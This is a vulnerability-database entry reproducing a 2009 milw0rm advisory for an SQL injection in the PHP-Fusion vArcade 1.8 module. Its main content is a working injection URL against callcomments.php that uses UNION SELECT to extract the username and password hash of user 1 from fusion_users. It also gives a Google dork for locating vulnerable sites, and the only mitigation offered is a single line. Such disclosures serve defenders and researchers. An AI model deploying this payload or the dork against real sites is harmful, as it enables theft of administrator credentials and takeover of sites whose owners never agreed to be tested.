header-logo
Suggest Exploit
vendor:
PHP-Fusion Mod vArcade
by:
Khashayar Fereidani
7.5
CVSS
HIGH
Sql Injection Vulnerability
89
CWE
Product Name: PHP-Fusion Mod vArcade
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: N/A
Related CWE: N/A
CPE: a:php-fusion:php-fusion_mod_varcade
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

PHP-Fusion Mod vArcade 1.8

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Mitigation:

Input validation and sanitization
Source

Exploit-DB raw data:

----------------------------------------------------------------

Script : PHP-Fusion Mod vArcade 1.8

Type : Sql Injection Vulnerability

Risk : High

----------------------------------------------------------------

Download From : http://venue.nu/

----------------------------------------------------------------

Discovered by : Khashayar Fereidani

My Official Website : HTTP://FEREIDANI.IR

Our Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

----------------------------------------------------------------

Sql Injection Vulnerability :

Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*

Google Dark : inurl:/infusions/varcade/

----------------------------------------------------------------

                        Tnx : God

          HTTP://IRCRASH.COM HTTP://FEREIDANI.IR

----------------------------------------------------------------

# milw0rm.com [2009-01-08]